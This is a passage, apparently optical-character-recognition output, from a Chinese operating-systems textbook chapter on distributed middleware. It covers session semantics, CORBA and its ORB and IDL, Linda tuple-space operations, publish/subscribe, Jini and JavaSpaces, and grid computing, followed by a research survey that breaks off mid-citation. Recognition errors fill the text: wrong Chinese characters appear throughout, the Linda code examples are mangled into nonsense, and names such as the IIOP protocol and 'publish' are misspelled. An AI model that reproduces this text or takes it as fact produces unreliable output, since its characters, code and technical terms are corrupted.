义 已 经 得 到 广泛 的 实现 ， 即 所 谓 的 会 话语 义 (session semantic) 。 








使 用 会 话语 义 产 生 了 新 的 问题 ， 即 如 果 两 个 或 更 多 的 客户 机 同时 绥 
存 并 修改 同一 个 文件 ， 应 该 怎么 办 ? 一 个 解决 方案 是 ， 当 每 个 文件 依次 
关闭 时 ， 其 值 会 被 送 回 给 服务 器 ， 所 以 最 后 的 结果 取决 于 哪个 文件 最 后 
关闭 。 一 个 不 太 令 人 满意 的 、 但 是 较 容易 实现 的 亚 代 方 采 是 ， 最 后 的 结 
朵 是 在 各 种 候选 中 选择 一 个 ， 但 并 不 指定 是 哪 一 个 。 











对 会 话语 义 的 另 一 种 处 理 方 式 是 ， 使 用 上 传 / 下 载 模式 ， 但 是 自动 
对 已 经 下 载 的 文件 加 锁 。 其 他 试图 下 载 该 文件 的 客户 机 将 被 挂 起 直到 第 
一 个 客户 机 返回 。 如 果 对 茶 个 文件 的 操作 要 求 非 常 多 ， 服 务 器 可 以 问 持 
有 该 文件 的 客户 机 发 送 消息 ， 询 问 是 否 可 以 加 快速 度 ， 不 过 这 样 做 可 能 
没有 人 作用。 总而言之 ， 正 确 地 实现 共享 文件 的 语义 是 一 件 环 手 的 事情 ， 
并 不 存在 一 个 优雅 和 有 效 的 解决 方案 。 








8.4.5 ”基于 对 象 的 中 间 件 


现在 让 我 们 考察 第 三 种 范 型 。 这 里 不 再 说 一 切 都 是 文档 或 者 一 切 都 
征文 件 ， 取 而 代 之 ， 我 们 会 说 一 切 都 是 对 象 。 对 象 是 变量 的 集合 ， 这 些 
变量 与 一 套 称 为 方法 的 访问 过 程 绑 定 在 一 起 。 进 程 不 允许 直接 访问 这 些 
变量 。 相 反 ， 要 求 它们 调用 方法 。 


有 一 些 程序 设计 语言 ， 如 C++ 和 Java， 是 面向 对 象 的 ， 但 这 些 对 象 
是 语言 级 的 对 象 ， 而 不 是 运行 时 刻 的 对 象 。 一 个 知名 的 基于 运行 时 对 象 
的 系统 是 CORBA 〈 公 共 对 象 请 求 代理 体系 结构 ，Common Object 
Request Broker Architecture) (Vinoski, 1997) 。CORBA 是 一 个 客户 
机 -服务 器 系统 ， 其 中 在 客户 机 上 的 客户 进程 可 以 调用 位 于 《可 能 是 远 
程 ) 服务 器 上 的 对 象 操作 。CORBA 是 为 运行 不 同 硬件 平台 和 操作 系统 
的 异 构 系 统 而 设计 的 ， 并 且 用 各 种 语言 编写 。 为 了 使 在 一 个 平台 上 的 客 
户 有 可 能 使 用 在 不 同 平台 上 的 服务 器 ， 将 ORB RERA, Object 
Request Broker) 插入 到 客户 机 和 服务 器 之 间 ， 从 而 使 它们 相互 匹配 。 
ORB 在 CORBA 中 扮演 着 重要 的 角色 ， 以 至 于 连 该 系统 也 采用 了 这 个 名 


称 。 














每 个 CORBA 对 象 是 由 叫做 IDL (接口 定义 语言 ，Interface Definition 
Language) 的 语言 中 的 接口 定义 所 定义 的 ， 说 明 该 对 象 提供 什么 方法 ， 


以 及 每 个 方法 期 望 使 用 什么 类 型 的 参数 。 可 以 把 IDL 的 规约 
(specification) 编译 进 客户 端 桩 过 程 中 ， 并 且 存 储 在 一 个 库 里 。 如 果 一 
个 客户 机 进程 预先 知道 它 需要 访问 某 个 对 象 ， 这 个 进程 则 与 该 对 象 的 客 
户 端 桩 代码 链接 。 也 可 以 把 IDL 规 约 编译 进 服务 器 一 方 的 一 个 框架 
(skeleton) 过程 中 。 如 果 不 能 提前 知道 进程 需要 使 用 哪 一 个 CORBA 对 
象 ， 进 行动 态 调用 也 是 可 能 的 ， 但 是 有 关 动 态 调 用 如 何 工作 的 原理 则 不 
在 本 书 的 讲述 范围 内 。 











当 创 建 一 个 CORBA 对 象 时 ， 一 个 对 它 的 引用 也 创建 出 来 并 返回 给 
创建 它 的 进程 。 该 引用 涉及 进程 如 何 标识 该 对 象 以 便 随 后 对 其 方法 进行 
调用 。 该 引用 还 可 以 传递 给 其 他 的 进程 或 存储 在 一 个 对 象 目录 中 。 








要 调用 一 个 对 象 中 的 方法 ， 客 尸 机 进程 必须 首先 获得 对 该 对 象 的 引 
用 。 引 用 可 以 直接 来 源 于 创建 进程 ， 或 更 有 可 能 是 ， 通 过 名 字 寻 找 或 通 
过 功能 在 茶 类 目录 中 寻找 。 一 旦 有 了 该 对 象 的 引用 ， 客 户 机 进程 将 把 方 
法 调用 的 参数 编排 进 一 个 便利 的 结构 中 ， 然 后 与 客户 机 ORB 联 系 。 接 
着 ， 客 户 机 ORB 回 服务 器 ORB 发 送 一 条 消 轧 ， 后 者 真正 调用 对 象 中 的 方 
法 。 整 个 机 制 类 似 于 RPC。 


























ORB 的 功能 是 将 客户 机 和 服务 絮 代 码 中 的 所 有 低层 次 的 分 布 和 通信 
细节 都 隐藏 起 来 。 特 别 地 ， 客 户 机 的 ORB 隐 藏 了 服务 器 的 位 置 、 服 务 器 
是 二 进 制 代码 还 是 脚本 、 服 务 器 在 什么 硬件 和 操作 系统 上 运行 、 有 关 对 
象 当 前 是 否 是 活动 的 以 及 两 个 ORB 是 如 何 通信 的 《〈 例 如，TCP/IP、 











RPC、 共 享 内 存 等 ) 。 


在 第 一 版 CORBA 中 ， 没 有 规定 客 尸 机 ORB 和 服务 右 ORB 之 间 的 协 

结果 导致 每 一 个 ORB 的 销售 商都 使 用 不 同 的 协议 ， 其 中 的 任何 两 个 
协议 之 间 都 不 能 彼此 通信 。 在 2.0 版 中 ， 规 定 了 协议 。 对 于 用 在 Internet 
上 的 通信 ， 协 议 称 为 IOP (Internet InterOrb Protocol) 。 


为 了 能 够 在 CORBA 系 统 中 使 用 那些 不 是 为 CORBA 编 写 的 对 象 ， 可 
以 为 每 个 对 象 装 备 一 个 对 象 适配器 〈object adapter) 。 对 象 适 配器 是 一 
种 包装 器 ， 它 处 理 诸如 登记 对 象 、 生 成 对 象 引用 以 及 激发 一 个 在 被 调用 
时 处 于 未 活动 状态 的 对 象 等 琐碎 事务 。 所 有 这 些 与 CORBA 有 关 部 分 的 
布局 如 图 8-39 所 示 。 





客户 机 客户 机 存根 框架 服务 器 
客户 机 
代码 


服务 器 
代码 


IIOP 协 议 








\ 网 络 


图 8-39 基于 CORBA 的 分 布 式 系统 中 的 主要 元 素 (CORBA 部 件 由 灰 
色 表 示 ) 


对 于 CORBA 而 言 ， 一 个 严重 问题 是 每 个 CORBA 对 象 只 存在 一 个 服 


务 嚣 上， 这 意味 着 那些 在 世界 各 地 客户 机 上 被 大 量 使 用 的 对 象 ， 会 有 很 
差 的 性 能 。 在 实践 中 ，CORBA 只 在 小 规模 系统 中 才能 有 效 工作 ， 比 
如 ， 在 一 台 计 算 机 、 一 个 局 域 网 或 者 一 个 公司 中 用 来 连接 进程 。 





8.4.6 ”基于 协作 的 中 间 件 


分 布 式 系 统 的 最 后 一 个 范 型 是 所 谓 基于 协作 的 中 间 件 
(coordination-based middleware) 。 我 们 将 从 Linda 系 统 开 始 ， 这 是 一 个 
开启 了 该 领域 的 学 术 性 研究 项 目 。 然 后 考察 主要 由 该 项 目 所 激发 的 两 个 
商业 案例 : pubilsh/subscribe 以 及 Jini。 


1.Linda 


Linda 是 一 个 由 耶鲁 大 学 的 David Gelernter 和 他 的 学 生 Nick 

Carriero (Carriero 与 Gelernter，1986; Carriero 与 Gelernter，1985) 研发 
的 用 于 通信 和 同步 的 新 系统 。 在 Linda 系 统 中 ， 相 互 独立 的 进程 之 间 通 
过 一 个 抽象 的 元 组 空间 (tuple space) 进行 通信 。 对 整个 系统 而 言 ， 元 
组 空间 是 全 局 性 的 ， 在 任何 机 器 上 的 进程 都 可 以 把 元 组 插入 或 移出 元 组 
空间 ， 而 不 用 考虑 它们 是 如 何 存放 的 以 及 存放 在 何 处 。 对 于 用 户 而 言 ， 
元 组 空间 像 一 个 巨大 的 全 局 共享 存储 器 ， 如 同 我 们 前 面 已 经 看 到 的 ( 见 
图 8-21c) 各 种 类 似 的 形式 。 


一 个 元 组 类 似 于 C 语 言 或 者 Java 中 的 结构 。 它 包括 一 个 或 多 个 域 ， 
每 个 域 是 一 个 由 基 语 言 (base language) 〈 通 过 在 已 有 的 语言 ， 如 C 语 
言 中 添加 一 个 库 ， 可 以 实现 Linda) 所 支持 的 某 种 类 型 的 值 。 对 于 C- 
Linda， 域 的 类 型 包括 整数 、 长 整数 、 浮 点 数 以 及 诸如 数组 (包括 字符 


P) 和 结构 《但 是 不 含有 其 他 的 元 组 ) 之 类 的 组 合 类 型 。 与 对 象 不 同 ， 
元 组 是 纯粹 的 数据 ， 它 们 没有 任何 相关 联 的 方法 。 在 图 8-40 中 给 出 了 三 


个 元 组 的 示例 。 


(abc 2, 5) 
("matrix-1", 1, 6, 3.14) 





("family", “is-sister", "Stephany", “Roberta") 


图 840 三 个 Linda 的 元 组 


在 元 组 上 存在 四 种 操作 。 第 一 种 out， 将 一 个 元 组 放 入 元 组 空间 
中 。 例 如 





eut-(“abe™,.2,5)3 





该 操作 将 元 组 (abc",2,5) 放 入 到 元 组 空间 中 。out 的 域 通 党 是 常数 、 
变量 或 者 是 表达 式 ， 例 如 








out ("matrix-1",1i,j,3.14); 








输出 一 个 市 有 四 个 域 的 元 组 ， 其 中 的 第 二 个 域 和 第 三 个 域 由 变量 i 
和 j 的 当前 值 所 决定 。 


通过 使 用 nm 原 语 可 以 从 元 组 空间 中 获取 元 组 。 该 原 语 通 过 内 容 而 不 
古 名 称 或 者 地 址 寻找 元 组 。in 的 域 可 以 是 表达 式 或 者 形式 参数 。 例 如 ， 


AE 


in (Tabet 2r ELNI 





这 个 操作 在 元 组 空间 中 “得 询 ” 包 含 字符 串 “abc”、 整 数 2 以 及 在 第 三 
个 域 中 含有 任意 整数 (假设 i 是 整数 ) 的 元 组 。 如 果 发 现 了 ， 则 将 该 元 
组 从 元 组 空间 中 移出 ， 并 且 把 第 三 个 域 的 值 赋 予 变量 i。 这 种 匹配 和 移 
出 操作 是 原子 性 的 ， 所 以 ， 如 果 两 个 进程 同时 执行 让 操作 ， 只 有 其 中 一 
个 会 成 功 ， 除 非 存在 两 个 或 更 多 的 匹配 元 组 。 在 元 组 空间 中 甚至 可 以 有 
同一 个 元 组 的 多 个 副本 存在 。 














in 采用 的 匹配 算法 是 很 直接 的 。ip 原 语 的 域 ， 称 为 模板 
(template) ，“〈 在 概念 上 ) 它 与 元 组 空间 中 的 每 个 元 组 的 同一 个 域 相 
比较 ， 如 果 下 面 的 三 个 条 件 都 符合 ， 那 么 产生 出 一 个 匹配 : 





1) 模 板 和 元 组 有 相同 数量 的 域 。 


2) 对 应 域 的 类 型 一 样 。 





3) 模 板 中 的 每 个 常数 或 者 变量 均 与 该 元 组 域 相 匹配 。 





形式 参数 ， 由 问号 标识 后 面 跟随 一 个 变量 名 或 类 型 所 给 定 ， 并 不 参 
与 匹配 〈 除 了 类 型 检查 例外 ) ， 尽 管 在 成 功 匹 配 之 后 ， 那 些 含有 一 个 变 
量 名 称 的 形式 参数 会 被 赋值 。 





如 果 没 有 匹配 的 元 组 存在 ， 调 用 进程 便 和 被 挂 起 ， 直 到 另 一 个 进程 插 
入 了 所 需要 的 元 组 为 止 ， 此 时 该 调用 进程 自动 复活 并 获得 新 的 元 组 。 进 
程 阻 窄 和 目 动 解除 阻 紧 意味 着 ， 如 末 一 个 进程 与 输出 一 个 元 组 有 关 而 为 
一 个 进程 与 输入 一 个 元 组 有 关 ， 那 么 谁 在 先是 无 关 紧要 的 。 惟 一 的 差别 
是 ， 如 果 in 在 out 之 前 被 调用 了 ， 那 么 会 有 少许 的 延 时 存在 ， 直 到 得 到 元 
组 为 止 。 














在 某 个 进程 需要 一 个 不 存在 的 元 组 时 ， 阻 塞 该 进程 的 方式 可 以 有 许 
多 用 途 。 例 如 ， 该 方式 可 以 用 于 信号 量 的 实现 。 为 了 要 建立 信号 量 S 或 
在 信号 量 S 上 执行 一 个 up 操作 ， 进 程 可 以 执行 如 下 操作 


out("semaphore S"); 





要 执行 一 个 down 操 作 ， 可 以 进行 


in("semaphore S"); 








在 元 组 空间 中 ("semaphore S) 元 组 的 数量 决定 了 信号 量 $S 的 状 
态 。 如 果 信 号 量 不 存在 ， 任 何 要 获得 信号 量 的 企图 都 会 被 阻塞 ， 直 到 某 
些 其 他 的 进程 提供 一 个 为 止 。 





除了 out 和 in 操 作 ，Linda 还 提供 了 原 语 read， 它 和 in 是 一 样 的 ， 不 过 
它 不 把 元 组 移出 元 组 空间 。 还 有 一 个 原 语 eval， 它 的 作用 是 同时 对 元 组 
的 参数 进行 计算 ， 计 算 后 的 元 组 会 被 放 进 元 组 空间 中 去 。 可 以 利用 这 个 








机 制 完成 一 个 任意 的 运算 。 以 上 内 容 说 明了 怎样 在 Linda 中 创建 并 行 的 


进程 。 
2. 发 布 /订阅 (Pubilsh/Subscribe) 


由 于 受到 Linda 的 局 发 ， 出 现 了 基于 协作 的 模型 的 一 个 例子 ， 称 作 
pubilsh/subscribe (Oki: A, 1993) 。 它 由 大 量 通 过 广播 网 网 络 互联 的 
进程 组 成 。 每 个 进程 可 以 是 一 个 信息 生产 者 、 信 息 消费 者 或 两 者 都 是 。 





当 一 个 信息 生产 者 有 了 一 条 新 的 信息 例如， 一 个 新 的 股票 价格 )》 
后 ， 它 就 把 该 信息 作为 一 个 元 组 在 网 络 上 广播 。 这 种 行为 称 为 发 布 
(publishing) 。 在 每 个 元 组 中 有 一 个 分 层 的 主题 行 ， 其 中 有 多 个 用 圆 
A CELAT) 分 隅 的 域 。 对 特定 信息 感 兴趣 的 进程 可 以 订阅 
(subscribe) 特定 的 专题 ， 这 包括 在 主题 行 中 使 用 通配符 。 在 同一 合 机 
名 上 ， 只 要 通知 一 个 元 组 守护 进程 就 可 以 完成 订阅 工作 ， 该 守护 进程 监 
测 已 出 版 的 元 组 并 仁 找 所 需要 的 专题 。 





发 布 /订阅 的 实现 过 程 如 图 8-41 所 示 。 当 一 个 进程 需要 发 布 一 个 元 组 
时 ， 筷 在 本 地 局 域 网 上 广播 。 在 每 台 机 器 上 的 元 组 守护 进程 则 把 所 有 的 
己 广 播 的 元 组 复制 进入 其 RAM。 人 然后 检查 主题 行 看 看 哪些 进程 对 它 感 
兴趣 ， 并 给 每 个 感 兴趣 的 进程 发 送 一 个 该 元 组 的 副本 。 元 组 也 可 以 在 广 
域 网 上 或 Intemet 上 进行 广播 ， 这 种 做 法 可 以 通过 将 每 个 局 域 网 中 的 一 台 
机 需 弯 作 信息 路 由 器 ， 用 来 收集 所 有 已 发 布 的 元 组 ， 然 后 转送 到 其 他 的 








局 域 网 上 再 次 广播 的 方法 来 实现 。 这 种 转送 方法 也 可 以 进行 得 更 为 聪 
明 ， 即 只 把 元 组 转送 给 至 少 有 一 个 需要 该 元 组 的 订阅 者 的 远程 局 域 网 。 
不 过 要 做 到 这 一 点 ， 需 要 使 用 信息 路 由 器 交换 有 关 订 阅 者 的 信息 。 





信息 路 由 器 


图 8-41 发 布 /订阅 的 体系 结构 


这 里 可 以 实现 各 种 语义 ， 包 括 可 靠 发 送 以 及 保证 发 送 ， 即 使 出 现 裔 
演 也 没有 关系 。 在 后 一 种 情形 下 ， 有 必要 存储 原 有 的 元 组 供 以 后 需要 时 
使 用 。 一 种 存储 的 方法 是 将 一 个 数据 库 系 统 和 该 系统 挂钩 ， 并 让 该 数据 
库 订 阅 所 有 的 元 组 。 这 可 以 通过 把 数据 库 封装 在 一 个 适配器 中 实现 ， 从 
而 允许 一 个 已 有 的 数据 库 以 发 布 /订阅 模型 工作 。 当 元 组 们 经 过 时 ， 适 
配器 就 一 一 抓 取 它们 并 把 它们 放 进 数据 库 中 。 





发 布 /订阅 模型 完全 把 生产 者 和 消费 者 分 隅 开 来 ， 如 同 在 Linda 中 一 
样 。 但 是 ， 有 的 时 候 还 是 有 必要 知道 ， 男 外 还 有 谁 对 某 种 信息 感 兴趣 。 
这 种 信息 可 以 用 如 下 的 方法 来 收集 : 发 布 一 个 元 组 ， 它 只 询问 :“ 谁 对 











信息 x 有 兴趣 ?”。 以 元 组 形式 的 啊 应 会 是 :“ 我 对 x 有 兴趣 。” 


3.Jini 


50 多 年 来 ， 计 算 始 终 是 以 CPU 为 中 心 的 ， 一 全 计算 机 就 是 一 个 独立 
的 装置 ， 包 括 一 个 CPU、 一 些 基本 和 存储器、 并 总 是 有 请 如 便 枚 等 这 样 一 
些 大 容量 的 存储 器 。Sun 公 司 的 Jini (基因 拼写 的 变形 ) 则 是 企图 改变 这 
种 计算 模型 的 一 个 尝试 ， 这 种 模型 可 以 摘 述 为 以 网 络 为 中 心 (Waldo， 
1999) 。 








在 Jini 世 界 中 有 大 量 自 包 含 的 Jini 设 备 ， 其 中 的 每 一 个 设备 都 为 其 他 
的 设备 提供 了 一 种 或 多 种 服务 。 可 以 把 Jini 设 备 插入 到 网 络 中 ， 并 且 立 
即 开始 提供 和 使 用 服务 ， 这 并 不 需要 复杂 的 安装 过 程 。 请 注意 ， 这 些 设 
备 是 被 插入 到 网 络 中 ， 而 不 是 如 同 传统 那样 插入 到 计算 机 中 。 一 个 Jini 
设备 可 以 是 一 台 传统 的 计算 机 ， 但 也 可 以 是 一 台 打 印 机 、 掌 上 电脑 、 蜂 
镶 电 话 、 电 视 机 、 立 体 音 响 或 其 他 带 有 CPU、 一 些 存储 器 以 及 一 个 (可 
能 是 无 线 ) 网 络 连接 的 设备 。Jini 系 统 是 Jini 设 备 的 一 个 松散 联邦 ，Jini 
设备 可 以 依照 自己 的 意愿 进入 和 离开 该 联邦 ， 不 存在 集权 式 的 管理 。 





当 一 个 Jini 设 备 想 加 入 Jini 联 邦 时 ， 它 在 本 地 局 域 网 上 广播 一 个 包 ， 
或 者 在 本 地 无 线 蜂 离 网 上 询问 是 人 否 存在 查询 服务 〈lookup service) 。 用 
于 寻找 查询 服务 的 协议 是 发 现 协 议 〈discovery protocol) 以 及 若干 Jini 硬 
线 协 议 中 的 某 一 个 。〔 另 一 种 寻找 方法 是 ， 新 的 Jini 设 备 可 以 等 待 直到 








有 一 个 周期 性 的 查询 服务 公告 经 过 ， 但 是 我 们 不 会 在 这 里 讨论 这 种 机 
制 ) 。 


当 查 询 服务 看 到 有 一 个 新 的 设备 想 注册 时 ， 它 用 一 段 可 以 用 来 完成 
注册 的 代码 作为 回答 。 由 于 Jini 是 纯 的 Java 系 统 ， 被 发 送 的 代码 是 
JVM ava E MILER) 形式 的 ， 所 有 的 Jini 设 备 必 定 能 运行 它 ， 通 常 
是 以 解释 方式 运行 。 接 着 ， 新 设备 运行 该 代码 ， 代 码 同 查询 服务 联系 并 
且 在 某 个 固定 的 时 间 段 中 进行 注册 。 在 该 时 间 段 失效 之 前 ， 如 果 有 意 
愿 ， 该 设备 就 可 以 注册 。 这 一 机 制 意味 着 ， 一 个 Jini 设 备 可 以 通过 关机 
的 方式 离开 系统 ， 有 关 该 设备 的 曾经 存在 的 状态 很 快 就 会 被 遗忘 掉 ， 不 
需要 任何 集中 性 的 管理 。 注 册 一 定 的 时 间 间 隔 的 做 法 ， 称 为 取得 一 项 租 
约 〈lease) 。 





请 注意 ， 由 于 用 于 注册 设备 的 代码 是 通过 下 载 进 入 设备 的 ， 因 此 注 
册 用 的 代码 会 随 痢 系统 演化 而 被 修改 把， 不 过 系统 的 演进 并 不 会 影响 设 
备 的 硬件 和 软件 。 事 实 上 ， 设 备 甚至 不 用 明白 什么 是 注册 协议 。 设 备 所 
需 明 白 的 只 是 整个 注册 过 程 中 的 一 段 ， 即 注册 的 设备 提供 的 一 些 属性 和 
代理 代码 ， 这 样 其 他 设备 稍 后 将 会 使 用 这 些 属性 和 代理 代码 ， 以 便 访 问 


该 设备 。 





寻找 菏 个 特定 服务 的 设备 和 用 户 可 以 请 求 得 询 服务 是 否 知道 这 样 的 
一 个 特定 服务 存在 。 在 该 请 求 中 可 以 包含 设备 在 注册 时 使 用 的 属性 。 如 
果 请 求 成 功 ， 在 该 设备 注册 时 所 提供 的 代理 就 会 被 送 回 给 请 求 者 ， 并 且 


加 以 运行 以 联络 有 关 设 备 。 这 样 ， 设 备 或 用 户 束 可 以 同 其 他 的 设备 对 
话 ， 而 无 须知 道 对 方 在 哪里 ， 甚 至 也 无 须知 道 对 话 所 用 的 协议 是 何 种 协 
We 

Jini 客 户 机 和 服务 〈 硬 件 或 软件 设备 ) 使 用 JavaSpace 进 行 通 信和 同 
步 ， 这 方式 实际 是 模仿 Linda 的 元 组 空间 ， 但 存在 一 些 重要 的 差别 。 每 
个 JavaSpace 由 一 些 强 类 型 的 记录 项 组 成 。 这 些 记录 项 与 Linda 的 元 组 类 
似 ， 不 过 它们 是 强 类 型 的 ， 而 Linda 的 元 组 则 是 无 类 型 的 。 在 每 个 记录 
项 中 包含 一 些 域 ， 每 个 域 中 有 一 个 基本 Java 类 型 。 例 如 ， 一 个 雇员 类 型 
的 记录 项 可 以 包括 一 个 字符 串 《〈 用 于 姓名 ) 、 一 个 整数 《用 于 部 门 ) 、 
第 二 个 整数 〈 用 于 电话 分 机 号 ) 以 及 一 个 布尔 值 〈《 用 于 全 时 工作 ) 。 




















在 JavaSpace 中 只 定义 了 四 个 方法 〈 尽 管 其 中 的 两 个 方法 还 有 一 个 变 
种 ) : 


1)Write: 把 一 个 记录 项 放 入 JavaSpace。 





2)Read: 将 一 个 与 模板 匹配 的 记录 项 复制 出 JavaSpace。 


3)Take: 复制 并 移 走 一 个 与 模板 匹配 的 记录 项 。 





4)Notify: 当 一 个 匹配 的 记录 项 写 入 时 通知 调用 者 。 








write 方 法 提供 记录 项 并 确定 其 租约 时 间 ， 即 何 时 应 该 丢弃 该 记录 
项 。 相 反 ，Linda 的 元 组 则 一 直 停 留 痢 直到 被 移出 为 止 。 在 JavaSpace 中 





可 以 保存 有 同一 个 记录 项 的 多 个 副本 ， 所 以 它 不 是 一 个 数学 意义 上 的 集 
合 〈 如 同 Linda 那 样 ) 。 


read 和 take 方 法 为 要 寻找 的 记录 项 提供 了 一 个 模板 。 在 该 模板 的 每 
个 域 中 有 一 个 必须 匹配 的 特定 值 ， 或 者 可 以 包含 一 个 “不 在 乎 ”的 通 配 
人 符 ， 该 通配符 可 以 匹配 所 有 合适 的 类 型 的 值 。 如 果 友 现 一 个 匹配 ， 则 返 
回 该 记录 项 ， 而 在 take 的 情形 下 ， 该 记录 项 还 被 移出 了 JavaSpace 空 间 。 
这 些 JavaSpace 方 法 中 的 每 一 个 都 有 两 个 变种 ， 在 没有 匹配 到 记录 项 时 ， 
它们 之 间 有 所 差别 。 其 中 一 个 变种 即刻 返回 一 个 失败 的 标识 。 而 男 一 个 
则 一 直 等 到 时 间 段 〈 作 为 一 个 参数 给 定 ) 到 期 为 止 。 


notify 方 法 用 一 个 特殊 模板 注册 兴趣 。 如 果 以 后 进来 了 一 个 相 匹配 
的 记录 项 ， 就 调用 调用 者 的 notify 方 法 。 


与 Linda 中 的 元 组 空间 不 同 ，JavaSpace 支 持原 子 事务 处 理 。 通 过 使 
用 原子 事务 处 理 ， 可 以 把 多 个 方法 聚集 在 一 起 。 它 们 要 么 全 部 都 执行 ， 
要 么 全 部 都 不 执行 。 在 该 事务 处 理 期 间 ， 在 该 事务 处 理 之 外 对 JavaSpace 
的 修改 是 不 可 见 的 。 只 有 在 该 事务 处 理 结束 之 后 ， 它 们 才 对 其 他 的 调用 
者 可 见 。 


可 以 在 通信 进程 之 间 的 同步 中 运用 JavaSpace。 例 如 ， 在 生产 者 - 消 
费 者 的 情形 下 ， 生 产 者 在 产品 生产 出 来 之 后 可 以 把 产品 放 进 JavaSpace 
中 。 消 费 者 使 用 take 取 走 这 些 产品 ， 如 果 产 品 没有 了 束 阻 奢 。JavaSpace 





保证 每 个 方法 的 执行 部 是 原子 性 的 ， 所 以 不 会 出 现 当 一 个 进程 试图 读 出 
一 个 记录 项 时 ， 该 记录 项 仅仅 完成 了 一 半 进 入 的 危险 。 


8.4.7 ”网 格 





如 果 没 有 谈 及 最 新 的 发 展 ， 即 在 未 来 有 可 能 变 得 非常 重要 的 网 格 ， 
那么 ， 对 于 分 布 式 系统 的 论述 将 是 不 完整 的 。 所 谓 网 格 〈grid) ， 是 一 
个 大 的 、 地 理 上 分 散 的 、 通 常 是 由 私有 网 络 或 因特网 连接 起 来 的 寞 构 机 
器 的 集合 ， 向 用 户 提供 一 系列 服务 。 有 时 候 网 格 也 被 比 作 虚拟 超级 计算 
机 ， 但 其 实 还 不 只 是 这 样 。 它 是 很 多 独立 计算 机 的 集合 ， 一 般 位 于 多 个 
管理 域 中 ， 所 有 的 这 些 管 理 域 都 会 运行 中 间 件 的 一 个 公共 的 中 间 件 层 以 
便 用 户 和 程序 可 以 通过 方便 和 一 致 的 方式 访问 所 有 资源 。 








构建 网 格 的 初始 动机 是 为 了 CPU 的 时 钟 周期 共享 。 当 时 的 想法 是 : 
当 一 个 机 构 不 需要 它 的 全 部 的 计算 能 力 时 例如 在 夜间 〉， 男 一 个 机 构 
(可 能 相 阳 好几 个 时 区 〉 就 可 以 利用 这 些 时 钟 周 期 ， 并 且 12 小 时 之 后 也 
对 外 提供 这 样 的 帮助 。 现 在 ， 网 格 研究 人 员 也 在 关注 其 他 资源 的 共享 ， 
尤其 是 专门 硬件 和 数据 库 。 








典型 地 ， 网 格 的 工作 原理 是 : 在 每 个 参与 的 机 器 中 运行 一 组 管理 机 
器 并 且 把 它 加 入 到 网 格 中 的 程序 。 这 个 程序 通常 需要 处 理 认 证 及 远程 用 
户 登 录 、 资 源 用 布 及 发 现 、 作 业 调 度 及 分 配 等 。 当 某 个 用 户 有 工作 需要 
计算 机 来 做 时 ， 网 格 软件 决定 哪里 有 空闲 的 硬件 、 软 件 和 数据 资源 来 完 
成 这 项 工作 ， 然 后 将 作业 搬运 过 去 ， 安 排 执 行 并 收集 计算 结果 返回 给 用 





在 网 格 世 界 中 ， 一 个 流行 的 中 间 件 叫 Globus Toolkit， 它 在 很 多 平台 
上 都 是 可 用 的 并 且 支 持 很 多 (即将 出 现 的 ) 网 格 标准 (Foster, 
2005) 。Globus 通 过 灵活 和 安全 的 方式 提供 一 个 供用 户 共 享 计算 机 、 文 
件 以 及 其 他 资源 的 平台 ， 同 时 又 不 会 牺牲 本 地 的 自治 性 。 网 格 正在 成 为 
很 多 分 布 式 应 用 的 构建 基础 。 








8.5 ”有关 多 处 理 机 系统 的 研究 


在 本 章 中 ， 我 们 考察 了 四 类 多 处 理 器 系统 : 多 处 理 器 、 多 计算 机 、 
虚拟 机 和 分 布 式 系统 。 下 面 简要 地 介绍 在 这 些 领 域 中 的 有 关 研 究 工作 。 





在 多 处 理 器 领域 中 的 多 数 研究 与 硬件 有 关 ， 特 别 是 与 如 何 构 建 共享 
存储 器 和 保持 其 一 致 性 〈 如 Higham 等 人 ，2007) 有 关 。 然 而 ， 还 有 一 
些 关 于 多 处 理 器 的 其 他 研究 ， 特 别 是 片上 多 处 理 器 ， 包 括 编程 模型 和 随 
之 带 来 的 操作 系统 问题 (Fedorova 等 人 ，2005; Tan 等 人 ，2007) 、 通 
信 机 制 〈Brisolara 等 人 ，2007) 、 软 件 的 能 源 管理 (Park A, 

2007) 、 安 全 (Yang 和 Peng，2006) 还 有 未 来 的 挑战 (Wolf， 
2004) 。 另 外 ， 对 调度 的 研究 也 总 是 很 流行 (Chen 等 人 ，2007; Lin 和 


Rajaraman, 2007; Rajagopalan 等 人 ，2007; Tam 等 人 ，2007; Yahav 等 








人 ，2007) 。 


多 计算 机 比 多 处 理 器 更 容易 构建 。 所 需要 的 只 是 一 批 PC 机 或 工作 
站 ， 以 及 一 个 高 速 网 络 。 由 于 这 个 原因 ， 在 大 学 中 多 计算 机 是 一 个 热门 
的 研究 课题 。 有 许多 工作 与 这 样 或 那样 的 分 布 式 共 孕 存储 器 有 关 ， 有 些 
征 基于 页 面 的 ， 有 些 是 在 整个 软件 中 的 〈Byung-Hyun 等 人 ，2004; 


Chapman 和 Heiser，2005; Huang 等 人 ，2001; Kontothanassis 等 人 ， 





2005; Nikolopoulos 等 人 ，2001; Zhang 等 人 ，2006) 。 编 程 模型 也 正在 
被 研究 (Dean 和 Ghemawat，2004) 。 当 规模 达到 好 几 万 个 CPU 的 时 


候 ， 数 据 中 心 的 能 源 使 用 也 是 一 个 问题 (Bash 和 Forman，2007; Ganesh 
等 人 ，2007; Villa, 2006) 。 


虚拟 机 是 一 个 特别 热门 的 话题 ， 针 对 不 同 的 方面 有 许多 论文 ， 包 括 
能 源 管理 (Moore A, 2005; Stoess 等 人 ，2007) 、 内 存 管理 〈Lu 和 
Shen, 2007) 和 信任 管理 (Garfinkel 等 人 ，2003; Lei 等 人 ，2003) 。 安 
全 也 是 一 个 方面 〈Jaeger 等 人 ，2007) 。 性 能 优化 也 是 一 个 很 有 意思 的 
问题 ， 特 别 是 CPU 的 性 能 〈King 等 人 ，2003) 、 网 络 性 能 (Menon 等 
人 ，2006) 、LO 性 能 (Cherkasova 和 Gardner，2005; Liu 等 人 ， 
2006) 。 虚 拟 机 使 得 迁移 变 得 可 行 ， 所 以 这 个 话题 也 引起 了 关注 
(Bradford, 2007; Huang 等 人 ，2007) 。 虚 拟 机 也 已 经 被 用 来 调 
试 操 作 系 统 (King 等 人 ，2005) 。 














随 着 分 布 式 计算 的 发 展 ， 己 经 有 很 多 关于 分 布 式 文件 及 存储 系统 方 
面 的 研究 ， 遇 到 的 问题 包括 : 站 遇 软 便 件 错误 、 人 为 错误 、 目 然 灾害 时 
的 长 期 可 维护 性 (Baker 等 人 ，2006; Kotla 等 人 ，2007; Maniatis 等 人 ， 
2005; Shah 等 人 ，2007; Storer 等 人 ，2007) 、 使 用 不 可 信 的 服务 器 
(Adya% A, 2002; Popescu 等 人 ，2003) 、 认 证 (Kaminsky A, 
